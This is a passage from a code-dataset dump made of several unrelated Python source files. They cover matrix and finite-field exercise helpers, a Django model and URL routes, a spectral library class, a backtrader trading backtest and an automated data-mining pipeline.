s+=(A[i][j])*(B[j][k])\r\n tmp.append(s)\r\n l.append(tmp)\r\n return l\r\n\r\n\r\ndef gentrianginf_inv(n,t):\r\n M = []\r\n for i in range(n):\r\n aux = []\r\n for j in range(i):\r\n aux = aux + [random.randrange(t)]\r\n aux = aux + [random.randrange(1,t)]\r\n aux = aux + [0]*(n-i-1)\r\n M = M + [aux]\r\n return M\r\n\r\n\r\ndef gentrianginf_mod26(n):\r\n not_trouve = True\r\n while not_trouve:\r\n M = [0]*n\r\n det = 1\r\n for i in range(n):\r\n M[i] = [0]*n\r\n for j in range(i):\r\n M[i][j] = random.randrange(26)\r\n M[i][i] = 2*random.randrange(13)+1\r\n det = det * M[i][i]\r\n not_trouve = (((det % 13) == 0) or ((det % 2)==0))\r\n return M\r\n\r\n\r\ndef genmatrix_inv(n):\r\n #pour l'intervalle du randrange, on peut mettre\r\n #ce que l'on veut, il n'y avait pas de contraintes\r\n # dans l'énoncé\r\n t = random.randrange(-99,99)\r\n M = gentrianginf_inv(n,t)\r\n N = gentrianginf_inv(n,t)\r\n N = transpose(N)\r\n prod = []\r\n for i in range(len(M)):\r\n aux = []\r\n for j in range(len(N[0])):\r\n somme = 0\r\n for k in range(len(M[0])):\r\n somme = somme + M[i][k] * N[k][j]\r\n aux = aux + [somme]\r\n prod = prod + [aux] \r\n return prod\r\n\r\n\r\ndef genmatrixinv_mod26(n):\r\n M = gentrianginf_mod26(n)\r\n N = gentrianginf_mod26(n)\r\n N = transpose(N)\r\n prod = []\r\n for i in range(len(M)):\r\n aux = []\r\n for j in range(len(N[0])):\r\n somme = 0\r\n for k in range(len(M[0])):\r\n somme = (somme + M[i][k] * N[k][j])%26\r\n aux = aux + [somme]\r\n prod = prod + [aux] \r\n return prod\r\n\r\n\r\ndef matvec(M,V):\r\n aux = []\r\n for i in range(len(M)):\r\n somme = 0\r\n for j in range(len(V)):\r\n somme = somme + M[i][j]*V[j]\r\n aux = aux + [somme]\r\n return aux\r\n\r\n\r\ndef circmultvec(M,V):\r\n W = []\r\n n = len(V)\r\n for i in range(n):\r\n # la ligne i commence avec l'element M[(n-i) % n]\r\n somme = 0\r\n for j in range(n):\r\n somme = somme + M[(j-i) % n]*V[j]\r\n W = W + [somme]\r\n return W\r\n \r\n \r\ndef circmultmat(A,B):\r\n\tP = []\r\n\tn = len(A)\r\n\tfor i in range(n):\r\n\t\tidxligneA = (-i % n)\r\n\t\taux = []\r\n\t\tfor j in range(n):\r\n\t\t\tsomme = 0\r\n\t\t\tfor k in range(n):\r\n\t\t\t\tidxligneB = (-k % n)\r\n\t\t\t\tsomme = somme + A[(idxligneA+k) % n]*B[(idxligneB+j) % n]\r\n\t\t\taux = aux + [somme]\r\n\t\tP = P + [aux]\r\n\treturn P\r\n\r\n\r\ndef prod_perm2(M,V):\r\n\tn = len(M)\r\n\tW = [] \r\n\tfor i in range(n):\r\n\t\tcpt = 0\r\n\t\twhile M[i] != 0:\r\n\t\t\tM[i] >>= 1\r\n\t\t\tcpt += 1\r\n\t\tW = W + [V[n-cpt]]\r\n\treturn W\r\n\r\n\r\ndef permute_from_list(L,V):\r\n\tW = []\r\n\tfor i in range(len(L)):\r\n\t\tW = W + [V[L[i]]]\r\n\treturn W\r\n\r\n\r\ndef is_triangsup(M):\r\n\tif len(M) != len(M[0]):\r\n\t\treturn False\r\n\tfor i in range(len(M)):\r\n\t\tfor j in range(i):\r\n\t\t\tif M[i][j] != 0:\r\n\t\t\t\treturn False\r\n\treturn True\r\n\r\n\r\ndef is_diag_dom(M):\r\n\test_dominante = True\r\n\ti = 0\r\n\twhile (i < len(M)) and (est_dominante):\r\n\t\tsomme = 0\r\n\t\tfor j in range(i):\r\n\t\t\tsomme = somme + abs(M[i][j])\r\n\t\tfor j in range(i+1,len(M)):\r\n\t\t\tsomme = somme + abs(M[i][j])\r\n\t\test_dominante = (abs(M[i][i]) >= somme)\r\n\t\ti = i + 1\r\n\treturn est_dominante\r\n\r\n\r\ndef is_diag_strict_dom(M):\r\n\test_dominante = True\r\n\ti = 0\r\n\twhile (i < len(M)) and (est_dominante):\r\n\t\tsomme = 0\r\n\t\tfor j in range(i):\r\n\t\t\tsomme = somme + abs(M[i][j])\r\n\t\tfor j in range(i+1,len(M)):\r\n\t\t\tsomme = somme + abs(M[i][j])\r\n\t\test_dominante = (abs(M[i][i]) > somme)\r\n\t\ti = i + 1\r\n\treturn est_dominante\r\n\r\n\r\ndef norme_infinie(L):\r\n\tmaxi = 0\r\n\tfor i in range(len(L)):\r\n\t\tsomme = 0\r\n\t\tfor j in range(len(L[0])):\r\n\t\t\tsomme = somme + abs(L[i][j])\r\n\t\tif somme > maxi:\r\n\t\t maxi = somme\r\n\treturn maxi\r\n\r\n\r\ndef norme_une(L):\r\n\tmax = 0\r\n\tfor j in range(len(L[0])):\r\n\t\tsomme = 0\r\n\t\tfor i in range(len(L)):\r\n\t\t\tsomme = somme + abs(L[i][j])\r\n\t\tif somme > max:\r\n\t\t max = somme\r\n\treturn max\r\n\r\n\r\ndef puissance(x,y,n):\r\n z = 1\r\n while y != 0:\r\n if (y & 1):\r\n z = (z * x) % n\r\n x = (x * x) % n\r\n y = y >> 1\r\n return z\r\n\r\n\r\n# ~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ fonctions annexes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef multbyalpha(b,f):\r\n y = b << 1\r\n taille = len(bin(f))-3\r\n if ((y & (1 << taille)) != 0):\r\n y = y ^ f\r\n return y\r\n\r\n\r\ndef multiplie(b,c,f):\r\n\tprod_ = 0\r\n\taux_ = c\r\n\twhile (b != 0):\r\n\t\tif (b & 1)!= 0:\r\n\t\t\tprod_ = prod_ ^ aux_\r\n\t\taux_ = multbyalpha(aux_,f)\r\n\t\tb = b >> 1\r\n\treturn prod_\r\n\r\n\r\ndef table_log(P):\r\n m_ = len(bin(P)) - 3\r\n cardinal = (1 << m_)\r\n L = [0]*cardinal\r\n L[0] = -1\r\n z = 1\r\n for j in range(0, cardinal-1):\r\n L[z] = j\r\n z = multbyalpha(z,P)\r\n return L\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Licence_2/S3/I33/corrections_tp_math/tp6.py","file_name":"tp6.py","file_ext":"py","file_size_in_byte":6024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38305696","text":"from django.db import models\n\nfrom .order import Order\n\nfrom artsumers.artsumersuser.models import ArtsumersUser\nfrom artsumers.core.models import TimeStampedModel\n\n\nclass ManagerMemo(TimeStampedModel):\n order = models.ForeignKey(Order, verbose_name='해당주문')\n memo = models.CharField(verbose_name='관리자메모', max_length=200)\n user = user = models.ForeignKey(\n ArtsumersUser, verbose_name='회원', null=True, blank=True)\n\n def __str__(self):\n return self.order.order_number\n\n class Meta:\n db_table = 'checkout_managermemo'\n ordering = ['-created_at']\n verbose_name = '관리자메모'\n verbose_name_plural = '관리자메모 관리'\n","sub_path":"artsumers/checkout/models/managermemo.py","file_name":"managermemo.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"160500804","text":"import unittest\n\nfrom model import churinjo\n\n\nclass ModelTest(unittest.TestCase):\n def setUp(self):\n print(\"Repository Test start\")\n\n def test_get_by_id(self):\n expected = 2\n actual = churinjo.get_churinjo_by_id(expected)\n self.assertEqual(expected, actual['id'])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"25155266","text":"#!/usr/bin/env python3\nfrom __future__ import print_function\nimport sys\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nimport re\nimport timeit\nimport os\nimport pathlib\n\nfrom mzlib.spectrum_library_index import SpectrumLibraryIndex\nfrom mzlib.spectrum import Spectrum\nfrom mzlib.index import MemoryIndex, SQLIndex\nfrom mzlib.backends import guess_implementation, SpectralLibraryBackendBase, SpectralLibraryWriterBase\n\n\ndebug = False\n\nclass SpectrumLibrary:\n \"\"\"\n SpectrumLibrary - Class for a spectrum library\n\n Attributes\n ----------\n identifier: str\n A unique identifier string assigned to this library by a spectral library host or\n provider.\n filename: str or Path\n A location on the local file system where the spectral library is stored\n format : string\n The name of the format for the current encoding of the library.\n backend: :class:`~.SpectralLibraryBackendBase`\n The implementation used to parse the file\n\n Methods\n -------\n read_header - Read just the header of the whole library\n read - Read the entire library into memory\n write - Write the library to disk\n create_index - Create an index file for this library\n transform - Not quite sure what this is supposed to be\n get_spectrum - Extract a single spectrum by identifier\n find_spectra - Return a list of spectra given query constraints\n\n \"\"\"\n\n\n def __init__(self, identifier=None, filename=None, format=None, index_type=None):\n \"\"\"\n __init__ - SpectrumLibrary constructor\n\n Parameters\n ----------\n format : string\n Name of the format for the current encoding of the library.\n\n \"\"\"\n self.backend = None\n self.identifier = identifier\n self.index_type = index_type\n self._format = format\n self.filename = filename\n\n def _init_from_filename(self, filename, index_type=None):\n if index_type is None:\n index_type = self.index_type\n if self.format is None:\n self.backend = guess_implementation(self.filename, index_type)\n self._format = self.backend.format_name\n else:\n backend_type = SpectralLibraryBackendBase.type_for_format(self.format)\n if backend_type is None:\n raise ValueError(\n f\"Could not find an implementation for {self.format}\")\n self.backend = backend_type(\n self.filename, index_type=index_type)\n self._format = self.backend.format_name\n\n def _backend_initialized(self):\n return self.backend is not None\n\n def _requires_backend(self):\n if not self._backend_initialized():\n raise ValueError(\n \"Cannot read library data, library parser not yet initialized\")\n\n #### Define getter/setter for attribute identifier\n @property\n def identifier(self):\n return(self._identifier)\n\n @identifier.setter\n def identifier(self, identifier):\n self._identifier = identifier\n\n #### Define getter/setter for attribute filename\n @property\n def filename(self):\n return(self._filename)\n\n @filename.setter\n def filename(self, filename):\n self._filename = filename\n if filename is not None:\n self._init_from_filename(filename)\n\n #### Define getter/setter for attribute format\n @property\n def format(self):\n return self._format\n\n @property\n def index(self):\n if self._backend_initialized():\n return self.backend.index\n return None\n\n @property\n def attributes(self):\n if self._backend_initialized():\n return self.backend.attributes\n return None\n\n def read_header(self):\n \"\"\"Read just the header of the whole library\n\n Returns\n -------\n bool:\n Whether the operation was successful\n \"\"\"\n self._requires_backend()\n return self.backend.read_header()\n\n def read(self):\n self._requires_backend()\n return self.backend.read()\n\n def write(self, destination, format=None):\n \"\"\"Write the library to disk\n \"\"\"\n filename = destination\n if not isinstance(filename, (str, pathlib.Path)):\n filename = getattr(destination, \"name\", None)\n\n if format is None and filename is not None:\n basename = os.path.basename(filename)\n tokens = basename.rsplit(\".\", 2)\n if len(tokens) == 3:\n writer_type = SpectralLibraryWriterBase.type_for_format('.'.join(tokens[1:]))\n else:\n raise ValueError(f\"Could not guess format from file name {filename}\")\n else:\n writer_type = SpectralLibraryWriterBase.type_for_format(format)\n if writer_type is None:\n raise ValueError(\n f\"Could not find a format writer from file name {filename} or format {format}\")\n writer = writer_type(destination)\n if self._backend_initialized():\n with writer:\n writer.write_library(self.backend)\n else:\n print(\"Library not initialized\")\n writer.close()\n\n def get_spectrum(self, spectrum_number=None, spectrum_name=None):\n \"\"\"Retrieve a single spectrum from the library.\n\n Parameters\n ----------\n spectrum_number : int, optional\n The index of the specturm in the library\n spectrum_name : str, optional\n The name of the spectrum in the library\n\n Returns\n -------\n :class:`~.Spectrum`\n \"\"\"\n self._requires_backend()\n return self.backend.get_spectrum(spectrum_number, spectrum_name)\n\n def find_spectra(self, specification, **query_keys):\n \"\"\"\n find_spectra - Return a list of spectra given query constraints\n \"\"\"\n self._requires_backend()\n return self.backend.find_spectra(specification, **query_keys)\n\n def __getitem__(self, i):\n self._requires_backend()\n return self.backend[i]\n\n def __len__(self):\n if self._backend_initialized():\n return len(self.backend)\n return 0\n\n def __iter__(self):\n if self._backend_initialized():\n return iter(self.backend)\n return iter([])\n\n def add_attribute(self, key, value, group_identifier=None):\n \"\"\"Add an attribute to the library level attributes store.\n\n Parameters\n ----------\n key : str\n The name of the attribute to add\n value : object\n The value of the attribute to add\n group_identifier : str, optional\n The attribute group identifier to use, if any. If not provided,\n no group is assumed.\n \"\"\"\n self._requires_backend()\n return self.backend.add_attribute(key, value, group_identifier=group_identifier)\n\n def get_attribute(self, key, group_identifier=None):\n \"\"\"Get the value or values associated with a given\n attribute key from the library level attribute store.\n\n Parameters\n ----------\n key : str\n The name of the attribute to retrieve\n group_identifier : str, optional\n The specific group identifier to return from.\n\n Returns\n -------\n attribute_value: object or list[object]\n Returns single or multiple values for the requested attribute.\n \"\"\"\n self._requires_backend()\n return self.backend.get_attribute(key, group_identifier=group_identifier)\n\n def remove_attribute(self, key, group_identifier=None):\n \"\"\"Remove the value or values associated with a given\n attribute key from the library level attribute store.\n\n This rebuilds the entire store, which may be expensive.\n\n Parameters\n ----------\n key : str\n The name of the attribute to retrieve\n group_identifier : str, optional\n The specific group identifier to return from.\n\n \"\"\"\n self._requires_backend()\n return self.backend.remove_attribute(key, group_identifier=group_identifier)\n\n def has_attribute(self, key):\n \"\"\"Test for the presence of a given attribute in the library\n level store.\n\n Parameters\n ----------\n key : str\n The attribute to test for\n\n Returns\n -------\n bool\n \"\"\"\n self._requires_backend()\n return self.backend.has_attribute(key)\n\n\n\n#### Example using this class\ndef example():\n\n #### Create a new RTXFeedback object\n spectrum_library = SpectrumLibrary()\n spectrum_library.filename = \"../refData/sigmaups1_consensus_final_true_lib.msp\"\n spectrum_library.read_header()\n\n spectrum_buffer = spectrum_library.get_spectrum(spectrum_index_number=2000)\n spectrum = Spectrum()\n spectrum.parse(spectrum_buffer)\n buffer = spectrum.write(format=\"text\")\n print(buffer)\n print()\n\n return()\n\n\n#### If this class is run from the command line, perform a short little test to see if it is working correctly\ndef main():\n\n #### Run an example\n example()\n return()\n\n\nif __name__ == \"__main__\": main()\n\n","sub_path":"mzSpecLib-master (wulong)/mzSpecLib-master/implementations/python/mzlib/spectrum_library.py","file_name":"spectrum_library.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442083346","text":"from django.conf.urls import url\n\nfrom anims import views\n# from ip import views\n\nurlpatterns = [\n \n url(r'^$', views.index, name='ip_index'),\n# url(r'^$', views.index),\n\n url(r'^index/$', views.index, name='ip_index'),\n \n # 20181010_084804\n url(r'^anims/$', views.anims, name='anims'),\n \n # 20181010_120542\n url(r'^anims_JS/$', views.anims_JS, name='anims_JS'),\n \n # 20181013_071822\n url(r'^open_dir/$', views.open_dir, name='open_dir'),\n \n]\n","sub_path":"JVEMV6/46_art/VIRTUAL/Admin_Projects/anims/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125660171","text":"'''\nFinal version to backtesting 494 stocks with our strategy \n'''\n\n\nfrom __future__ import (absolute_import, division, print_function,unicode_literals)\n\nimport datetime \nimport os \nimport backtrader as bt \nfrom backtrader.feeds import GenericCSVData \nimport argparse\n\n# better plotting and results analys\nfrom backtrader_plotting import Bokeh\nimport pandas as pd\nfrom joblib import dump, load\n\n\n\n# extending orginal GenericCSVData to includes predict columns \nclass GenericCSVDataEx(GenericCSVData):\n\n lines = (('predict'),)\n params = (('predict', 71),)\n \n# creating strategy\nmaximum_holding = 5\nclass DPStrategy(bt.Strategy):\n params = (\n ('trailpercent', 0.05),\n )\n\n def __init__(self):\n # create list to store position\n self.hold_stocks = []\n self.log_data = []\n self.orders = {}\n \n def log(self, txt, dt=None):\n ''' logging function'''\n dt = dt or self.datas[0].datetime.date(0)\n print('%s, %s' % (dt.isoformat(), txt))\n self.log_data.append(f'{dt.isoformat()} {txt}')\n \n def notify_order(self, order):\n if order.status in [bt.Order.Completed]:\n if order.isbuy():\n print(': BUY {} EXECUTED, Price: {:.2f}'.format( order.data._name, order.executed.price))\n else: # Sell\n self.orders.pop(order.data._name)\n self.hold_stocks.remove(order.data._name)\n self.log(': SELL {} EXECUTED, Price: {:.2f}'.format( order.data._name, order.executed.price))\n # print('{}: SELL {} EXECUTED, Price: {:.2f}'.format(\n # self.datetime.date(), order.data._name, order.executed.price))\n elif order.status in [bt.Order.Rejected, bt.Order.Margin, bt.Order.Cancelled, bt.Order.Expired]:\n if order.data._name in self.hold_stocks:\n self.hold_stocks.remove(order.data._name)\n self.log(': order {} Failed!'.format(order.data._name))\n # print('{}: order {} failed!'.format(self.datetime.date(), order.data._name))\n\n def notify_trade(self, trade):\n if not trade.isclosed:\n return\n self.log(': TRADING {} OPERATION PROFIT, GROSS {:.2f}, NET {:.2f}'.format(\n trade.data._name, trade.pnl, trade.pnlcomm))\n #print('{}: TRADING {} OPERATION PROFIT, GROSS {:.2f}, NET {:.2f}'.format(\n #self.datetime.date(), trade.data._name, trade.pnl, trade.pnlcomm))\n \n def next(self):\n # print current postion situation\n self.log(f': Position: {self.hold_stocks}')\n # check if stock has been in selling order \n for stk in self.hold_stocks:\n \n if stk not in self.orders:\n print(self.getdatabyname(stk)._name)\n self.orders[stk] = self.close(data = self.getdatabyname(stk),\n exectype = bt.Order.StopTrail, trailpercent = self.p.trailpercent)\n\n if len(self.hold_stocks) < maximum_holding:\n buy_dict = {}\n # searching for the highest trading volume to buy\n for i, d in enumerate(self.datas):\n if d._name not in self.hold_stocks:\n buy_dict[d] = self.datas[i].volume[0]\n buy_dict = sorted(buy_dict.items(), key = lambda x : x[1], reverse = True)\n for d in buy_dict:\n if (d[0]._name in self.hold_stocks) & (d[0].predict == 1):\n continue\n \n # Set the buying share for each order\n stake = int(self.broker.cash / (maximum_holding - len(self.hold_stocks)) // (d[0].close[0])) \n # stake = 100\n self.buy(data = d[0], size = stake)\n self.hold_stocks.append(d[0]._name)\n if len(self.hold_stocks) >= maximum_holding:\n break\n \n def stop(self):\n with open('resluts_log.txt', 'w') as e:\n for line in self.log_data:\n e.write(line + '\\n')\n\n\n#backtesting\nif __name__ == '__main__':\n #* Getting stock list \n # getting currecnt working dirctory\n cwd = os.getcwd()\n path = cwd + '/TPData1'\n\n stocklist = []\n for filename in os.listdir(path):\n if filename.endswith('.csv'):\n stocklist.append(filename[3:-4])\n print(f'There are {len(stocklist)} stocks in S&P500 \\n')\n\n cerebro = bt.Cerebro(stdstats=False)\n # adding strategy\n cerebro.addstrategy(DPStrategy)\n \n for stock in stocklist:\n datapath = cwd + f'/BTData1/bt_{stock}' +'.csv'\n # adding stock price data into backtesting system\n data = GenericCSVDataEx(\n dataname = datapath,\n fromdate = datetime.datetime(2020, 1, 1),\n todate = datetime.datetime(2021, 2, 20),\n #todate = datetime.datetime(2018, 1, 15),\n nullvalue = 0.0,\n dtformat = ('%Y-%m-%d'),\n datetime = 0,\n open = 1,\n high = 2,\n low = 3,\n close = 4,\n volume = 5,\n openinterest = -1,\n predict = 71,\n ma5 = 6\n )\n \n cerebro.adddata(data, name = stock)\n \n # set principle \n cerebro.broker.setcash(100000.0)\n # set commission \n cerebro.broker.setcommission(commission=0.00025)\n # Add analyzer\n cerebro.addanalyzer(bt.analyzers.SharpeRatio, _name = 'SharpeRatio')\n cerebro.addanalyzer(bt.analyzers.DrawDown, _name='DW')\n \n \n # print out starting capital \n print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())\n # start backtesting \n results = cerebro.run()\n \n strat = results[0]\n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())\n print('SR:', strat.analyzers.SharpeRatio.get_analysis())\n print('DW:', strat.analyzers.DW.get_analysis())\n\n # plot\n # cerebro.plot()\n #b = Bokeh(style='bar')\n #cerebro.plot(b)\n \n # print out final capital \n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())\n print(f'return_rate: {round(cerebro.broker.getvalue()/100000 -1,4)*100}%')\n \n\n","sub_path":"7MTP_BacktestV3.py","file_name":"7MTP_BacktestV3.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"469038246","text":"\n__author__ = [\"Candy Espulgar\"]\n__copyright__ = \"Copyright 2019 - TE3D House, Copyright 2020 - Liverpool Hope University\"\n__credits__ = [\"Arnulfo Azcarraga, Neil Buckley\"]\n__version__ = \"3.0\"\n\n'''\n This script contains all calls to the various Automated Mining\n Modules. It is also the script that is called when the Run button\n is clicked in the AM tab.\n [Candy]\n'''\n\nimport os\nimport time\n# Uploader support for converting read dataset\nimport __Loader_support as LS\nimport __RFE_support as RFES\nimport __Filter_support as FILS\nimport __CrossProcess_support as CPS\nimport __CrossProcess_MP_support as CMPS\nimport __Depth_support as DS\nimport _UIConstants_support as UICS\nimport _AMVariables_support as AMVS\n\n\ndef loaderModule():\n start_time = time.time()\n\n df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset, frequency_count = LS.loadInput() # Can add parameters\n\n # Record run time\n module_time = (time.time() - start_time)\n\n # Update singleton frequency\n AMVS.getSingleton().updateFrequency_LoaderModule(frequency_count, module_time)\n\n return df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset\n\ndef rfeModule(df_raw_dataset, ftr_names, pd_raw_dataset, controller):\n controller.updateModuleProgress(0, UICS.FIRST_MESSAGE_SPACE + \"[ Starting Automated OOTO Miner] \") # 1\n # time.sleep(1)\n\n dict_rfe = RFES.performRFE(df_raw_dataset, ftr_names, pd_raw_dataset, controller)\n return dict_rfe\n\ndef filterModule(dict_context, controller):\n\n i = 1\n print(\"Context Features:\")\n text = \"Context Features:\"\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n for key, value in dict_context.items():\n text = \"CF\" + str(i) + \" - \" + str(value)\n print(text)\n i = i + 1\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n controller.getAMController().addToConsoleInput(text + \"\\n\")\n\n\n start_time = time.time()\n\n # Takes the dictionary and converts it to the correct format for Crossing (e.g. [\"b5:a\", \"b5:b\"])\n extracted_cross_filters, frequency_count = FILS.extractCrossFilters(dict_context, controller)\n\n # NOTE: CROSS is the collection of SSFs\n CROSS, frequency_count = FILS.processLVLs(extracted_cross_filters) # Returns the filter list for each level\n\n # Record run time\n module_time = (time.time() - start_time)\n\n # Update singleton frequency\n AMVS.getSingleton().updateFrequency_FilterModule(frequency_count, module_time)\n\n return CROSS\n\n\ndef crossProcessModule(df_dataset, np_CROSS, depth, controller):\n start_time = time.time()\n\n dict_significant_results, frequency_count, highest_process_frequency = CMPS.crossProcessOptimized(df_dataset, np_CROSS, depth, controller)\n\n # Record run time\n module_time = (time.time() - start_time)\n\n # Update singleton frequency\n AMVS.getSingleton().updateFrequency_CrossProcessModule(frequency_count, highest_process_frequency, module_time)\n\n return dict_significant_results\n\n\n\n\ndef runAutomatedMining(controller):\n\n text = \"RUNNING Automated Mining\\n\" # Show start message in console\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n\n text = \"MAX CROSS: \" + str(UICS.MAX_CROSS) # Show MAX CROSS in console and input\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n controller.getAMController().addToConsoleInput(text + \"\\n\")\n\n text = \"MAX LEVEL: \" + str(UICS.MAX_LEVEL) + \"\\n\" # Show MAX LEVEL in console and input\n controller.getAMController().addToConsoleAll(text + \"\\n\")\n controller.getAMController().addToConsoleInput(text + \"\\n\")\n\n df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset = loaderModule()\n\n # Run STATIC depth mining (Loops based on MAX DEPTH)\n # dict_significant_results = runStaticDepthMining(df_raw_dataset, df_dataset, ftr_names, controller)\n\n # Depth mining that continues on until the p-value stops updating\n dict_significant_results = runMobileDepthMining(df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset, controller)\n\n controller.isAMFinished() # Enables the Check button (Call on completion of the last iteration)\n print(\"Automated Mining Finished...\")\n\n str_depths = str(AMVS.getSingleton().getDepths())\n controller.getAMController().addToConsoleAll(\"\\nTotal Depth: \" + str_depths)\n print(\"Total Depth \" + str_depths)\n\n str_run_time = str(AMVS.getSingleton().getTime())\n controller.getAMController().addToConsoleAll(\"\\nAM Run time:\\n\" + str_run_time + \" seconds\\n\")\n print(\"Mining Run Time: \" + str_run_time + \" seconds\")\n\n AMVS.getSingleton().resetSingleton()\n return dict_significant_results\n\n\n\n'''\n Mine data according to the p-value.\n The miner continues until p-value stops updating.\n'''\ndef runMobileDepthMining(df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset, controller):\n singleton = AMVS.getSingleton() # A Singleton class is used\n dict_significant_results = None\n isUpdating = True\n hasPrevSSFs = True\n i_depth = 0\n\n while isUpdating: # Keep looping until the stop criteria are met\n curr_depth = i_depth + 1\n singleton.resetCtrAccepted()\n\n print(\"Starting DEPTH: \" + str(curr_depth))\n # Select SSFs, if first iteration, use RFE, else load the generated SSFs of the previous depth\n if i_depth == 0:\n print(\"Loading SEED SSFs...\")\n # dict_ranked_features = rfeModule(df_raw_dataset, ftr_names, controller)\n dict_ranked_features = UICS.SEED_SSFS\n AMVS.getSingleton().updateDictSSFs(dict_ranked_features, curr_depth)\n print(\"-- Successfully Loaded SEED SSFs --\")\n\n print(\"Extracting RFE Features\")\n # rfe_features = rfeModule(df_raw_dataset, ftr_names, pd_raw_dataset, controller)\n # print(\"-- Successfully Determined RFE Features --\")\n # print(rfe_features)\n print(\"\")\n\n else:\n print(\"Extracting SSFs from Previous Depth [\" + str(i_depth) + \"]...\")\n # Load the previous SSFs and consolidate. The current depth\n # indicates the PREVIOUS SSF folder.\n df_SSFs = DS.loadPreviousSSFs(i_depth)\n print(\"df_SSFs\")\n print(df_SSFs)\n\n\n if df_SSFs is None: # If there were no previously loaded SSFs, stop updating TODO: check if this can be determined earlier\n hasPrevSSFs = False\n isUpdating = False\n dict_ranked_features = None\n print(\"-- Failed to Locate Previous SSFs --\")\n else:\n # Partition the extracted SSFs to 3 Ranks\n dict_new_ranked_features = DS.rankSSFs(df_SSFs)\n # Merge the new SSFs with the old SSFs\n AMVS.getSingleton().updateDictSSFs(dict_new_ranked_features, curr_depth)\n print(\"RANK\")\n dict_ranked_features = AMVS.getSingleton().getDictSSFs()\n print(dict_ranked_features)\n print(\"-- Successfully Extracted Previous SSFs --\")\n\n if hasPrevSSFs:\n print(\"Starting Filtering...\")\n np_cross = filterModule(dict_ranked_features, controller)\n print(\"-- Filtering Finished --\")\n print(\"\")\n\n print(\"Starting Cross Process...\")\n dict_significant_results = crossProcessModule(df_dataset, np_cross, curr_depth, controller)\n print(\"-- Cross Process Finished --\")\n\n\n list_SSFs = getSSFsList(dict_ranked_features)\n print(list_SSFs)\n # if isConstantSSFs(list_SSFs): # Stop mining if the current list of SSFs have been parsed before\n if singleton.isConstantSSFs(list_SSFs): # Stop mining if the current list of SSFs have been parsed before\n isUpdating = False\n elif singleton.getCtrAccepted() == 0: # Mark mining as finished when there are no more accepted values\n isUpdating = False\n\n print(singleton.getCtrAccepted())\n\n i_depth = i_depth + 1\n\n singleton.updateFrequencyCountsText(curr_depth)\n\n singleton.setDepths(i_depth - 1) # Log total number of depths\n singleton.printAllTextData()\n\n return dict_significant_results\n\n\n'''\n Converts the values in the SSFs dictionary to a list.\n'''\ndef getSSFsList(dict_SSFs):\n list_SSFs = []\n\n for key, value in dict_SSFs.items():\n list_SSFs.append(value)\n\n return list_SSFs\n\n'''\n This function checks if the SSFs have been parsed\n before. If so, it returns True.\n'''\ndef isConstantSSFs(list_currSSFs):\n singleton = AMVS.getSingleton()\n llist_prevSSFs = singleton.getLlSSFs() # Get the list of all parsed SSFs (from all depths) via the Singleton class\n state = False\n\n for SSFs in llist_prevSSFs:\n # Check if all items in the current SSFs list are contained\n # in any previously parsed SSFs list\n state = isListsMatch(SSFs, list_currSSFs)\n if state: # If there's a match, stop looping and return 'state'\n break\n\n return state\n\n\n'''\n This function checks if all items in list2 are in list1.\n'''\ndef isListsMatch(list1, list2):\n\n # len_list1 = len(list1)\n # len_list2 = len(list2)\n\n # if len_list1 > len_list2:\n # list_A = list1\n # list_B = list2\n # else:\n # list_A = list2\n # list_B = list1\n\n # Checks if all elements of list2 is in list1\n isMatch = all(item in list1 for item in list2)\n\n return isMatch\n\n\n\n'''\n Mine data according to the value of MAX DEPTH.\n MAX DEPTH is declared in the UICS script.\n'''\ndef runStaticDepthMining(df_raw_dataset, df_dataset, ftr_names, pd_raw_dataset, controller):\n depth = UICS.MAX_DEPTH\n start_depth = UICS.getStartDepth() # Getting it this way will subtract 1 from the value, to be used as an index\n dict_significant_results = None\n\n for i_depth in range(start_depth, depth): # TODO: Fix this so that it will stop according to the change in p-value\n curr_depth = i_depth + 1\n\n print(\"Starting DEPTH: \" + str(curr_depth) + \" of \" + str(depth))\n # Select SSFs, if first iteration, use RFE, else load the generated SSFs of the previous depth\n if i_depth == 0:\n print(\"Starting RFE...\")\n dict_ranked_features = rfeModule(df_raw_dataset, ftr_names, pd_raw_dataset, controller)\n print(\"-- RFE Finished --\")\n print(\"\")\n\n else:\n print(\"Extracting SSFs from Previous Depth [\" + str(i_depth) + \"]...\")\n # Load the previous SSFs and consolidate. The current depth\n # indicates the PREVIOUS SSF folder.\n df_SSFs = DS.loadPreviousSSFs(i_depth)\n # Partition the extracted SSFs to 3 Ranks\n dict_ranked_features = DS.rankSSFs(df_SSFs)\n print(\"-- Successfully Extracted 